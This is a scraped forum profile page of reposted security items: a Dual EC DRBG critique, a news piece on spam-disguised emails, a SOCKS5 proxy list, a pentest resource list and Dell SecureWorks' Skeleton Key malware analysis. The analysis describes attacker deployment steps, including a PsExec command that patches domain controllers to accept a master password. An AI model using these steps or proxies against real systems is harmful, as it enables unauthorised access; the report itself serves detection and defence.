-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Daca ai antivirus, e posibil sa fie de la self defence-ul sau.
-
Ce e ala "hidden pid"? Te referi la rootkit-uri?
-
Nu. Dar anumite persoane au facut boti pentru Like/Dislike. Aceste Like-uri si Dislike-uri la gramada afecteaza reputatia.
-
Terrorists Made Their Emails Seem Like Spam to Hide From Intelligence Agencies By Lily Hay Newman Maybe there's something meaningful hidden in my spam folder. Image from Gmail During David Petraeus and Paula Broadwell's affair, the two would communicate by leaving notes in the drafts folder of a private Gmail account. As a covert communication method it didn't really, um, work. But points for effort! There are other ways to hide (or at least try to hide) emails in plain sight, too. And a recent paper recounts one method the Taliban tried shortly after the 9/11 attacks. First spotted by Quartz, cryptologist and former NSA officer Michael Wertheimer's paper "Encryption and the NSA Role in International Standards" includes an anecdote about how the NSA wised up to a strategy of turning real emails into spam. By writing messages with spam-like subject lines, combatants were attempting to exploit surveillance filters so that instead of being combed, the messages would be sorted into the spam folder abyss. Wertheimer explains that during operations in Afghanistan, the U.S. was able to analyze some laptops formerly owned by Taliban members. He says: In one case we were able to retrieve an email listing in the customary to/from/subject/date format. There was only one English language email listed. The “to” and “from” addresses were nondescript (later confirmed to be combatants) and the subject line read: CONSOLIDATE YOUR DEBT. From a surveillance perspective, Wertheimer writes that this highlights the importance of filtering algorithms. Implementing them makes parsing huge amounts of data easier, but it also presents opportunities for someone with a secret to figure out what type of information is being tossed out and exploit the loophole. The new trend in affair protocol could be sending love notes with subject line "Pain-free penis enlargement!" Future Tense is a partnership of Slate, New America, and Arizona State University. Sursa: http://www.slate.com/blogs/future_tense/2015/01/15/after_9_11_laptops_showed_that_taliban_members_had_hidden_messages_in_spam.html
-
Hopefully the last post I'll ever write on Dual EC DRBG
Nytro posted a topic in Tutoriale in engleza
Hopefully the last post I'll ever write on Dual EC DRBG I've been working on some other blog posts, including a conclusion of (or at least an installment in) this exciting series on zero knowledge proofs. That's coming soon, but first I wanted to take a minute to, well, rant. The subject of my rant is this fascinating letter authored by NSA cryptologist Michael Wertheimer in February's Notices of the American Mathematical Society. Dr. Wertheimer is currently the Director of Research at NSA, and formerly held the position of Assistant Deputy Director and CTO of the Office of the Director of National Intelligence for Analysis. In other words, this is a guy who should know what he's talking about. The subject of Dr. Wertheimer's letter is near and dear to my heart: the alleged subversion of NIST's standards for random number generation -- a subversion that was long suspected and apparently confirmed by classified documents leaked by Edward Snowden. The specific algorithm in question is called Dual EC DRBG, and it very likely contains an NSA backdoor. Those who've read this blog should know that I think it's as suspicious as a three dollar bill. Reading Dr. Wertheimer's letter, you might wonder what I'm so upset about. On the face of it, the letter appears to express regret. To quote (with my emphasis): With hindsight, NSA should have ceased supporting the Dual_EC_DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. In truth, I can think of no better way to describe our failure to drop support for the Dual_EC_DRBG algorithm as anything other than regrettable. The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm. Indeed, we support NIST’s April 2014 decision to remove the algorithm. Furthermore, we realize that our advocacy for the Dual_EC_DRBG casts suspicion on the broader body of work NSA has done to promote secure standards. I agree with all that. The trouble is that on closer examination, the letter doesn't express regret for the inclusion of Dual EC DRBG in national standards. The transgression Dr. Wertheimer identifies is merely that NSA continued to support the algorithm after major questions were raised. That's bizarre. Even worse, Dr. Wertheimer reserves a substantial section of his letter for a defense of the decision to deploy Dual EC. It's those points that I'd like to address in this post. Let's take them one at a time. 1: The Dual_EC_DRBG was one of four random number generators in the NIST standard; it is neither required nor the default. It's absolutely true that Dual EC was only one of four generators in the NIST standard. It was not required for implementers to use it, and in fact they'd be nuts to use it -- given that overall it's at least two orders of magnitude slower than the other proposed generators. The bizarre thing is that people did indeed adopt Dual EC in major commercial software packages. Specifically, RSA Security included it as the default generator in their popular BSAFE software library. Much worse, there's evidence that RSA was asked to do this by NSA, and were compensated for their compliance. This is the danger with standards. Once NIST puts its seal on an algorithm, it's considered "safe". If the NSA came to a company and asked it to use some strange, non-standard algorithm, the request would be considered deeply suspicious by company and customers alike. But how can you refuse to use a standard if your biggest client asks you to? Apparently RSA couldn't. 2: The NSA-generated elliptic curve points were necessary for accreditation of the Dual_EC_DRBG but only had to be implemented for actual use in certain DoD applications. This is a somewhat misleading statement, one that really needs to be unpacked. First, the original NSA proposal of Dual EC DRBG contained no option for alternate curve points. This is an important point, since its the selection of curve points that give Dual EC its potential for a "back door". By generating two default points (P, Q) in a specific way, the NSA may have been able to create a master key that would allow them to very efficiently decrypt SSL/TLS connections. If you like conspiracy theories, here's what NIST's John Kelsey was told when he asked how the NSA's points were generated: In 2004-2005, several participants on the ANSI X9 tools committee pointed out the potential danger of this backdoor. One of them even went so far as to file a patent on using the idea to implement key escrow for SSL/TLS connections. (It doesn't get more passive aggressive than that.) In response to the discovery of such an obvious flaw, the ANSI X9 committee immediately stopped recommending the NSA's points -- and relegated them to be simply an option, one to be used by the niche set of government users who required them. I'm only kidding! Actually the committee did no such thing. Instead, at the NSA's urging, the ANSI committee retained the original NSA points as the recommended parameters for the standard. It then added an optional procedure for generating alternative points. When NIST later adopted the generator in its SP800-90A standard, it mirrored the ANSI decision. But even worse, NIST didn't even bother to publish the alternative point generation algorithm. To actually implement it, you'd need to go buy the (expensive) non-public-domain ANSI standard and figure it out to implement it yourself: This is, to paraphrase Douglas Adams, the standards committee equivalent of putting the details in the bottom of a locked filing cabinet stuck in a disused lavatory with a sign on the door saying 'Beware of the Leopard'. To the best of our knowledge, nobody has ever used ANSI's alternative generation procedure in a single one of the many implementations of Dual EC DRBG in commercial software. It's not even clear how you could have used that procedure in a FIPS-certified product, since the FIPS evaluation process (conducted by CMVP) still requires you to test against the NSA-generated points. 3. The trapdoor concerns were openly studied by ANSI X9F1, NIST, and by the public in 2007. This statement has the benefit of being literally true, while also being pretty damned misleading. It is true that in 2007 -- after Dual EC had been standardized -- two Microsoft researchers, Dan Shumow and Neils Ferguson openly raised the alarm about Dual EC. The problem here is that the flaws in Dual EC were not first discovered in 2007. They were discovered much earlier in the standardization process and nobody ever heard about them. As I noted above, the ANSI X9 committee detected the flaws in Dual EC as early as 2004, and in close consultation with NSA agreed to address them -- in a manner that was highly beneficial to the NSA. But perhaps that's understandable, given that the committee was anything but 'open'. In fact, this is an important aspect of the controversy that even NIST has criticized. The standardization of these algorithms was conducted through ANSI. And the closed ANSI committee consisted of representatives from a few select companies, NIST and the NSA. No public notice was given of the potential vulnerabilities discovered in the RNG. Moreover, a patent application that might have shone light on the backdoor was mired in NSA pre-publication review for over two years. This timeline issue might seem academic, but bear this in mind: we now know that RSA Security began using the Dual EC DRBG random number generator in BSAFE -- as the default, I remind you -- way back in 2004. That means for three years this generator was widely deployed, yet serious concerns were not communicated to the public. To state that the trapdoor concerns were 'openly' studied in 2007 is absolutely true. It's just completely irrelevant. In conclusion I'm not a mathematician, but like anyone who works in a mathematical area, I find there are aspects of the discipline that I love. For me it's the precision of mathematical statements, and the fact that the truth or falsity of a statement can -- ideally -- be evaluated from the statement itself, without resorting to differing opinions or understandings of the context. While Dr. Wertheimer's letter is hardly a mathematical work, it troubles me to see such confusing statements in a publication of the AMS. As a record of history, Dr. Wertheimer's letter leaves much to be desired, and could easily lead people to the wrong understanding. Given the stakes, we deserve a more exact accounting of what happened with Dual EC DRBG. I hope someday we'll see that. Posted by Matthew Green at 2:02 PM Sursa: http://blog.cryptographyengineering.com/2015/01/hopefully-last-post-ill-ever-write-on.html -
[h=1]16-01-15 | VIP Socks 5 (37)[/h] 16-01-15 | VIP Socks 5 (37) Checked & filtered 108.61.199.192:52159 109.214.194.248:40557 120.149.52.133:46698 144.76.4.211:11486 147.156.208.150:8020 170.163.116.108:80 173.176.202.55:39559 174.7.63.126:41263 180.153.139.246:8888 184.155.230.151:44911 198.27.67.24:53193 199.36.221.3:51328 205.237.251.209:13884 206.188.209.38:8080 206.206.85.37:28672 207.66.105.37:11944 209.33.80.159:46768 221.132.35.5:2214 46.4.88.203:9050 58.160.148.1:54931 61.147.67.2:9125 61.15.158.32:57809 63.141.227.91:7504 67.187.241.140:22465 67.232.19.137:51816 70.173.38.183:19102 72.133.32.186:24412 73.29.157.190:24521 74.100.219.155:40866 76.190.129.189:37506 76.8.6.186:29803 77.120.246.195:48059 77.242.22.254:8741 84.38.227.212:2235 84.40.9.22:50027 92.247.235.170:40325 97.101.240.83:21729 Sursa: 16-01-15 | VIP Socks 5 (37) - Pastebin.com
-
Anunt: Cine isi mai bate joc de Like-uri si Dislike-uri sau foloseste boti pentru asa ceva are ban.
-
Posted January 13th, 2015 by gk A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory. Tor Browser 4.0.3 is based on Firefox ESR 31.4.0, which features important security updates to Firefox. Additionally, it contains updates to meek, NoScript and Tor Launcher. Here is the changelog since 4.0.2: All Platforms Update Firefox to 31.4.0esr Update NoScript to 2.6.9.10 Update meek to 0.15 Update Tor Launcher to 0.2.7.0.2 Translation updates only Sursa: https://blog.torproject.org/blog/tor-browser-403-released
-
[h=2]Awesome Penetration Testing[/h] A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things Online Resources Penetration Testing Resources Shell Scripting Resources Linux Resources Shellcode development Social Engineering Resources Lock Picking Resources [*] Tools Penetration Testing Distributions Basic Penetration Testing Tools Vulnerability Scanners Network Tools Hex Editors Crackers Windows Utils DDoS Tools Social Engineering Tools Anonimity Tools Reverse Engineering Tools [*] Books Penetration Testing Books Hackers Handbook Series Network Analysis Books Reverse Engineering Books Malware Analysis Books Windows Books Social Engineering Books Lock Picking Books [*]Vulnerability Databases [*]Security Courses [*]Information Security Conferences [*]Information Security Magazines [*]Awesome Lists [*]Contribution [*]License [h=3][/h][h=3]Online Resources[/h] [h=4]Penetration Testing Resources[/h] Metasploit Unleashed - Free Offensive Security metasploit course PTES - Penetration Testing Execution Standard OWASP - Open Web Application Security Project OSSTMM - Open Source Security Testing Methodology Manual [h=4]Shell Scripting Resources[/h] LSST - Linux Shell Scripting Tutorial [h=4]Linux resources[/h] Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their Kernels [h=4][/h][h=4]Shellcode development[/h] Shellcode Tutorials - Tutorials on how to write shellcode Shellcode examples - Shellcodes database [h=4][/h][h=4]Social Engineering Resources[/h] Social Engineering Framework - An information resource for social engineers [h=4][/h][h=4]Lock Picking Resources[/h] Schuyler Towne channel - Lockpicking videos and security talks [h=3][/h][h=3]Tools[/h] [h=4][/h][h=4]Penetration Testing Distributions[/h] Kali - A Linux distribution designed for digital forensics and penetration testing NST - Network Security Toolkit distribution Pentoo - security-focused livecd based on Gentoo BackBox - Ubuntu-based distribution for penetration tests and security assessments [h=4]Basic Penetration Testing Tools[/h] Metasploit - World's most used penetration testing software Burp - An integrated platform for performing security testing of web applications [h=4]Vulnerability Scanners[/h] Netsparker - Web Application Security Scanner Nexpose - Vulnerability Management & Risk Management Software Nessus - Vulnerability, configuration, and compliance assessment Nikto - Web application vulnerability scanner OpenVAS - Open Source vulnerability scanner and manager OWASP Zed Attack Proxy - Penetration testing tool for web applications w3af - Web application attack and audit framework Wapiti - Web application vulnerability scanner [h=4][/h][h=4]Networks Tools[/h] nmap - Free Security Scanner For Network Exploration & Security Audits tcpdump/libpcap - A common packet analyzer that runs under the command line Wireshark - A network protocol analyzer for Unix and Windows Network Tools - Different network tools: ping, lookup, whois, etc netsniff-ng - A Swiss army knife for for network sniffing Intercepter-NG - a multifunctional network toolkit [h=4]SSL Analysis Tools[/h] SSLyze - SSL configuration scanner [h=4]Hex Editors[/h] HexEdit.js - Browser-based hex editing [h=4]Crackers[/h] John the Ripper - Fast password cracker Online MD5 cracker - Online MD5 hash Cracker [h=4]Windows Utils[/h] Sysinternals Suite - The Sysinternals Troubleshooting Utilities Windows Credentials Editor - security tool to list logon sessions and add, change, list and delete associated credentials [h=4]DDoS Tools[/h] LOIC - An open source network stress tool for Windows JS LOIC - JavaScript in-browser version of LOIC [h=4]Social Engineering Tools[/h] SET - The Social-Engineer Toolkit from TrustedSec [h=4]Anonimity Tools[/h] Tor - The free software for enabling onion routing online anonymity I2P - The Invisible Internet Project [h=4]Reverse Engineering Tools[/h] IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger WDK/WinDbg - Windows Driver Kit and WinDbg OllyDbg - An x86 debugger that emphasizes binary code analysis [h=3]Books[/h] [h=4]Penetration Testing Books[/h] The Art of Exploitation by Jon Erickson, 2008 Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011 Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014 Rtfm: Red Team Field Manual by Ben Clark, 2014 The Hacker Playbook by Peter Kim, 2014 The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013 Professional Penetration Testing by Thomas Wilhelm, 2013 Advanced Penetration Testing for Highly-Secured Environments by Lee Allen,2012 Violent Python by TJ O'Connor, 2012 Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007 [h=4]Hackers Handbook Series[/h] The Shellcoders Handbook by Chris Anley and others, 2007 The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011 iOS Hackers Handbook by Charlie Miller and others, 2012 Android Hackers Handbook by Joshua J. Drake and others, 2014 The Browser Hackers Handbook by Wade Alcorn and others, 2014 [h=4]Network Analysis Books[/h] Nmap Network Scanning by Gordon Fyodor Lyon, 2009 Practical Packet Analysis by Chris Sanders, 2011 Wireshark Network Analysis by by Laura Chappell, Gerald Combs, 2012 [h=4]Reverse Engineering Books[/h] Reverse Engineering for Beginners by Dennis Yurichev (free!) The IDA Pro Book by Chris Eagle, 2011 Practical Reverse Engineering by Bruce Dang and others, 2014 Reverse Engineering for Beginners [h=4]Malware Analysis Books[/h] Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012 The Art of Memory Forensics by Michael Hale Ligh and others, 2014 [h=4]Windows Books[/h] Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu [h=4]Social Engineering Books[/h] The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002 The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005 Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011 No Tech Hacking by Johnny Long, Jack Wiles, 2008 Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010 Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014 [h=4][/h][h=4]Lock Picking Books[/h] Practical Lock Picking by Deviant Ollam, 2012 Keys to the Kingdom by Deviant Ollam, 2012 [h=3]Vulnerability Databases[/h] NVD - US National Vulnerability Database CERT - US Computer Emergency Readiness Team OSVDB - Open Sourced Vulnerability Database Bugtraq - Symantec SecurityFocus Exploit-DB - Offensive Security Exploit Database Fulldisclosure - Full Disclosure Mailing List MS Bulletin - Microsoft Security Bulletin MS Advisory - Microsoft Security Advisories Inj3ct0r - Inj3ct0r Exploit Database Packet Storm - Packet Storm Global Security Resource SecuriTeam - Securiteam Vulnerability Information CXSecurity - CSSecurity Bugtraq List Vulnerability Laboratory - Vulnerability Research Laboratory ZDI - Zero Day Initiative [h=3][/h][h=3]Security Courses[/h] Offensive Security Training - Training from BackTrack/Kali developers SANS Security Training - Computer Security Training & Certification Open Security Training - Training material for computer security classes CTF Field Guide - everything you need to win your next CTF competition [h=3]Information Security Conferences[/h] DEF CON - An annual hacker convention in Las Vegas Black Hat - An annual security conference in Las Vegas BSides - A framework for organising and holding security conferences CCC - An annual meeting of the international hacker scene in Germany DerbyCon - An annual hacker conference based in Louisville PhreakNIC - A technology conference held annually in middle Tennessee ShmooCon - An annual US east coast hacker convention CarolinaCon - An infosec conference, held annually in North Carolina HOPE - A conference series sponsored by the hacker magazine 2600 SummerCon - One of the oldest hacker conventions, held during Summer Hack.lu - An annual conference held in Luxembourg HITB - Deep-knowledge security conference held in Malaysia and The Netherlands Troopers - Annual international IT Security event with workshops held in Heidelberg, Germany Hack3rCon - An annual US hacker conference ThotCon - An annual US hacker conference held in Chicago LayerOne - An annual US security conerence held every spring in Los Angeles DeepSec - Security Conference in Vienna, Austria SkyDogCon - A technology conference in Nashville [h=3][/h][h=3]Information Security Magazines[/h] 2600: The Hacker Quarterly - An American publication about technology and computer "underground" Hakin9 - A Polish online, weekly publication on IT Security [h=3]Awesome Lists[/h] SecTools - Top 125 Network Security Tools C/C++ Programming - One of the main language for open source security tools .NET Programming - A software framework for Microsoft Windows platform development Shell Scripting - Command-line frameworks, toolkits, guides and gizmos Ruby Programming by @SiNdresorhus - JavaScript in command-line Node.js Programming by @vndmtrx - JavaScript in command-line Python tools for penetration testers - Lots of pentesting tools are written in Python Python Programming by @svaksha - General Python programming Python Programming by @vinta - General Python programming Andorid Security - A collection of android security related resources Awesome Awesomness - The List of the Lists [h=3][/h][h=3]Contribution[/h] Your contributions and suggestions are heartily? welcome. (????) [h=3][/h][h=3]License[/h] This work is licensed under a Creative Commons Attribution 4.0 International License Sursa: https://github.com/enaqx/awesome-pentest
- 6 replies
-
- 12
-
-
-
Skeleton Key Malware Analysis Author: Dell SecureWorks Counter Threat Unit™ Threat Intelligence Date: 12 January 2015 URL: Skeleton Key Malware Analysis | Dell SecureWorks Summary Dell SecureWorks Counter Threat Unit (CTU) researchers discovered malware that bypasses authentication on Active Directory (AD) systems that implement single-factor (password only) authentication. Threat actors can use a password of their choosing to authenticate as any user. This malware was given the name "Skeleton Key." CTU researchers discovered Skeleton Key on a client network that used single-factor authentication for access to webmail and VPN, giving the threat actor unfettered access to remote access services. Skeleton Key is deployed as an in-memory patch on a victim's AD domain controllers to allow the threat actor to authenticate as any user, while legitimate users can continue to authenticate as normal. Skeleton Key's authentication bypass also allows threat actors with physical access to login and unlock systems that authenticate users against the compromised AD domain controllers. The only known Skeleton Key samples as of this publication lack persistence and must be redeployed when a domain controller is restarted. CTU researchers suspect that threat actors can only identify a restart based on their inability to successfully authenticate using the bypass, as no other malware was detected on the domain controllers. Between eight hours and eight days of a restart, threat actors used other remote access malware already deployed on the victim's network to redeploy Skeleton Key on the domain controllers. Skeleton Key requires domain administrator credentials for deployment. CTU researchers have observed threat actors deploying Skeleton Key using credentials stolen from critical servers, administrators' workstations, and the targeted domain controllers. Analysis CTU researchers initially observed a Skeleton Key sample named ole64.dll on a compromised network (see Table 1). [TABLE=class: tabularr] [TR] [TH]Attribute[/TH] [TH]Value or description[/TH] [/TR] [TR] [TD]Filename[/TD] [TD]ole64.dll[/TD] [/TR] [TR] [TD]MD5[/TD] [TD]bf45086e6334f647fda33576e2a05826[/TD] [/TR] [TR] [TD]SHA1[/TD] [TD]5083b17ccc50dd0557dfc544f84e2ab55d6acd92[/TD] [/TR] [TR] [TD]Compile time[/TD] [TD]2014-02-19 09:31:29[/TD] [/TR] [TR] [TD]Deployed[/TD] [TD]As required (typically downloaded using malware and then deleted after use)[/TD] [/TR] [TR] [TD]File size[/TD] [TD]49664 bytes[/TD] [/TR] [TR] [TD]Sections[/TD] [TD].text, .rdata, .data, .pdata, .rsrc, .reloc[/TD] [/TR] [TR] [TD]Exports[/TD] [TD]ii (installs the patch) uu (uninstalls the patch) DllEntryPoint (default DLL entry point)[/TD] [/TR] [/TABLE] Table 1. Skeleton Key sample ole64.dll. When investigating ole64.dll, CTU researchers discovered an older variant named msuta64.dll on a "jump host" in the victim's network (see Table 2). The jump host is any system previously compromised by the threat actors' remote access malware. This variant includes additional debug statements, which allow the Skeleton Key developer to observe the memory addresses involved in the patching process. [TABLE=class: tabularr] [TR] [TH]Attribute[/TH] [TH]Value or description[/TH] [/TR] [TR] [TD]Filename[/TD] [TD]msuta64.dll[/TD] [/TR] [TR] [TD]MD5[/TD] [TD]66da7ed621149975f6e643b4f9886cfd[/TD] [/TR] [TR] [TD]SHA1[/TD] [TD]ad61e8daeeba43e442514b177a1b41ad4b7c6727[/TD] [/TR] [TR] [TD]Compile time[/TD] [TD]2012-09-20 08:07:12[/TD] [/TR] [TR] [TD]Deployed[/TD] [TD]2013-09-29 07:58:16[/TD] [/TR] [TR] [TD]File size[/TD] [TD]50688 bytes[/TD] [/TR] [TR] [TD]Sections[/TD] [TD].text, .rdata, .data, .pdata, .rsrc, .reloc[/TD] [/TR] [TR] [TD]Exports[/TD] [TD]i (installs the patch) u (uninstalls the patch) DllEntryPoint (default DLL entry point)[/TD] [/TR] [/TABLE] Table 2. Skeleton Key sample msuta64.dll. The threat actors used the following process to deploy Skeleton Key as a 64-bit DLL file: Upload the Skeleton Key DLL file to a staging directory on a jump host in the victim's network. CTU researchers have observed three filenames associated with the Skeleton Key DLL file: ole64.dll, ole.dll, and msuta64.dll. Windows systems include a legitimate ole32.dll file, but it is not related to this malware. Attempt to access the administrative shares on the domain controllers using a list of stolen domain administrator credentials. If the stolen credentials are no longer valid, use password theft tools to extract clear text domain administrator passwords from one of the following locations, which suggest a familiarity with the victim's environment: memory of another accessible server on the victim's network domain administrators' workstations targeted domain controllers [*]Use valid domain administrator credentials to copy the Skeleton Key DLL to C:\WINDOWS\system32\ on the target domain controllers. [*]Use the PsExec utility to run the Skeleton Key DLL remotely on the target domain controllers using the rundll32 command. The threat actor's chosen password is formatted as an NTLM password hash rather than provided in clear text. After Skeleton Key is deployed, the threat actor can authenticate as any user using the threat actor's configured NTLM password hash: psexec -accepteula \\%TARGET-DC% rundll32 <DLL filename> ii <NTLM password hash> [*]Delete the Skeleton Key DLL file from C:\WINDOWS\system32\ on the targeted domain controllers. [*]Delete the Skeleton Key DLL file from the staging directory on the jump host. [*]Test for successful Skeleton Key deployment using "net use" commands with an AD account and the password that corresponds to the configured NTLM hash. CTU researchers have observed a pattern for the injected password that suggests that the threat group has deployed Skeleton Key in multiple organizations. The use of PsExec can be detected within a Windows environment by alerting on the Windows events generated by the utility. The following Event IDs observed on the targeted domain controllers record the PsExec tool installing its service, starting the service, and stopping the service. These events are created every time PsExec is used, so additional analysis of the events is required to determine if they are malicious or legitimate: Unexpected PSEXESVC service install events (event ID 7045) on AD domain controllers: Log Name: System Source: Service Control Manager Summary: A service was installed in the system. Service File Name: %SystemRoot%\PSEXESVC.exe Unexpected PSEXESVC service start / stop events (event ID 7036) on AD domain controllers: Log Name: System Source: Service Control Manager Summary: "The PSEXESVC service entered the running state." "The PSEXESVC service entered the stopped state." When run, Skeleton Key performs the following tasks: Check for one of the following compatible 64-bit Windows versions. The malware is not compatible with 32-bit Windows versions or with Windows Server versions beginning with Windows Server 2012 (6.2). 6.1 (Windows 2008 R2) 6.0 (Windows Server 2008) 5.2 (Windows 2003 R2) [*]Use the SeDebugPrivilege function to acquire the necessary administrator privileges to write to the Local Security Authority Subsystem Service (LSASS) process. This process controls security functions for the AD domain, including user account authentication. [*]Enumerate available processes to acquire a handle to the LSASS process. [*]Obtain addresses for the authentication-related functions that will be patched: CDLocateCSystem — located in cryptdll.dll SamIRetrieveMultiplePrimaryCredentials — located in samsrv.dll SamIRetrievePrimaryCredentials — located in samsrv.dll [*]Perform OS-specific adjustments using the global variable set during the compatibility check in Step 1. [*]Use the OpenProcess function to acquire a handle to the LSASS process. [*]Reserve and allocate the required memory space to edit and patch the LSASS process's memory. [*]Patch relevant functions based on the operating system: CDLocateCSystem (all compatible Windows versions) SamIRetrieveMultiplePrimaryCredentials (only Windows 2008 R2 (6.1)) SamIRetrievePrimaryCredentials (all compatible Windows versions other than Windows 2008 R2 (6.1)) Skeleton Key performs the following steps to patch each function: Call the VirtualProtectEx function to change the memory protection to allow writing to the required memory allocations (PAGE_EXECUTE_READWRITE, 0x40). This step allows the function's code to be updated in memory. Call the WriteProcessMemory function to change the address of the target function to point to the patched code. This change causes calls to the target function to use the patch instead. Restore the original memory protection by calling VirtualProtectEx with the original memory protection flags. This step is likely to avoid suspicious writable and executable memory allocations. After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords. This authentication bypass applies to all services that use single-factor AD authentication, such as web mail and VPNs, and it also allows a threat actor with physical access to a compromised system to unlock the computer by typing the injected password on the keyboard. Possible link to domain replication issues The Skeleton Key malware does not transmit network traffic, making network-based detection ineffective. However, the malware has been implicated in domain replication issues that may indicate an infection. Shortly after each deployment of the Skeleton Key malware observed by CTU researchers, domain controllers experienced replication issues that could not be explained or addressed by Microsoft support and eventually required a reboot to resolve. These reboots removed Skeleton Key's authentication bypass because the malware does not have a persistence mechanism. Figure 1 shows the timeline of these reboots and the threat actors' subsequent password theft, lateral expansion, and Skeleton Key deployment. Redeployments typically occurred within several hours to several days of the reboot. Figure 1. Relationships of deployments and reboots observed by CTU researchers, April - July 2014. (Source: Dell SecureWorks) Countermeasures The Skeleton Key malware bypasses authentication and does not generate network traffic. As a result, network-based intrusion detection and intrusion prevention systems (IDS/IPS) will not detect this threat. However, CTU researchers wrote the YARA signatures in Appendix A to detect a Skeleton Key DLL and the code it injects into the LSASS process's memory. Threat indicators The threat indicators in Table 3 can be used to detect activity related to the Skeleton Key malware. [TABLE=class: tabularr] [TR] [TH]Indicator[/TH] [TH]Type[/TH] [TH]Context[/TH] [/TR] [TR] [TD]66da7ed621149975f6e643b4f9886cfd[/TD] [TD]MD5 hash[/TD] [TD]Skeleton Key patch msuta64.dll[/TD] [/TR] [TR] [TD]ad61e8daeeba43e442514b177a1b41ad4b7c6727[/TD] [TD]SHA1 hash[/TD] [TD]Skeleton Key patch msuta64.dll[/TD] [/TR] [TR] [TD]bf45086e6334f647fda33576e2a05826[/TD] [TD]MD5 hash[/TD] [TD]Skeleton Key patch ole64.dll[/TD] [/TR] [TR] [TD]5083b17ccc50dd0557dfc544f84e2ab55d6acd92[/TD] [TD]SHA1 hash[/TD] [TD]Skeleton Key patch ole64.dll[/TD] [/TR] [/TABLE] Table 3. Indicators for the Skeleton Key malware. Conclusion The CTU research team recommends that organizations implement the following protections to defend against the Skeleton Key malware: Multi-factor authentication for all remote access solutions, including VPNs and remote email, prevents threat actors from bypassing single-factor authentication or authenticating using stolen static credentials. A process creation audit trail on workstations and servers, including AD domain controllers, may detect Skeleton Key deployments. Specifically, organizations should look for the following artifacts: Unexpected PsExec.exe processes and the use of the PsExec "-accepteula" command line argument Unexpected rundll32.exe processes Process arguments that resemble NTLM hashes (32 characters long, containing digits 0-9 and characters A-F) [*]Monitoring Windows Service Control Manager events on AD domain controllers may reveal unexpected service installation events (event ID 7045) and service start/stop events (event ID 7036) for PsExec's PSEXESVC service. Appendix A — YARA signatures The following YARA signatures detect the presence of Skeleton Key on a system, by scanning either a suspicious file or a memory dump of Active Directory domain controllers suspected to contain Skeleton Key. rule skeleton_key_patcher { strings: $target_process = "lsass.exe" wide $dll1 = "cryptdll.dll" $dll2 = "samsrv.dll" $name = "HookDC.dll" $patched1 = "CDLocateCSystem" $patched2 = "SamIRetrievePrimaryCredentials" $patched3 = "SamIRetrieveMultiplePrimaryCredentials" condition: all of them } rule skeleton_key_injected_code { strings: $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 } $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 } $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 } condition: any of them } Sursa: Skeleton Key Malware Analysis | Dell SecureWorks
-
